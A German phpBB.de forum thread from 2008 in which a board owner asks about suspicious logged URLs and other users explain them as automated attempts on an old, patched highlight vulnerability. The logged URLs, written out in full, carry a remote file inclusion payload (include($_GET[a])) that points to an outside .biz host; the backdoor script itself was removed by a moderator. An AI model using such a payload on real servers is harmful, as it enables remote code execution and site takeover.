phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Ich denke dass wahr ein Hackversuch

https://www.phpbb.de/community/viewtopic.php?t=170125

Seite 1 von 1

Ich denke dass wahr ein Hackversuch

Verfasst: 01.05.2008 18:46
von neuer
Vielleicht kann mir das mal jemand erklären und mir die ganze geschicht interpretieren.

also gefundene url im cback wahr:

Code: Alles auswählen

einmal so:
http://www.mein-forum.de//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??

und einmal so:

http://www.mein-forum.de/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??
und dann habe ich mal nachgeschaut was sich dahinter verbirgt und das wahr dann dass hier:

Code: Alles auswählen

--edit cYbercOsmOnauT-- Code eines Backdoorscripts gelöscht
Muss ich mir da sorgen machen ?
Was hat der Versucht zu machen?
jetzt habe ich noch ein anderes problem das laden der index dauert mit dem ff ewig lange und mit dem normalen explorer bekomm ich ne weiße seite, aber nicht immer nur manchmal ist das soo?





PS: sorry das der code den thread blääääät ;)

Verfasst: 01.05.2008 20:16
von cYbercOsmOnauT
1.) Ich hoffe im cback (dem Chris) hast Du den Code nicht gefunden. :D
2.) Sorgen musst Du Dir keine machen, denn wenn es geblockt wird, kommt es auch nicht durch.

Grüße,
Tekin

Verfasst: 03.05.2008 09:30
von neuer
ok dank dir!!!


wäre es nicht eigentlich besser die bots schon mit der htaccess auszusperren????

Verfasst: 03.05.2008 09:52
von Boecki91
Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. :) Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.

Verfasst: 03.05.2008 19:42
von neuer
Boecki91 hat geschrieben:Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. :) Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.
was meinst du mit dem hintergrundrauschen?????

aber du hast recht updates sind ungemein wichtig. will garnicht ohne denen leben hehe.

Verfasst: 04.05.2008 15:21
von Boecki91
Diese Angriffe laufen automatisiert, das heißt ein Rechner sucht selbst (mit Google und Co) nach phpBB Foren, und ruft diese dann auf, um diese Anzugreifen, da diese Angriffsmethode aber auf einem altem Sicherheitsloch beruht, passiert deinem Forum gar nichts, und da solche "Angriffe" häufiger Vorkommen sagt man einfach "Hintergrundrauschen" dazu, ähnlich wie beim Radio, wenn man immer die richtige Frequenz benutzt hat man keine Probleme mit dem Hintergrundrauschen.
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de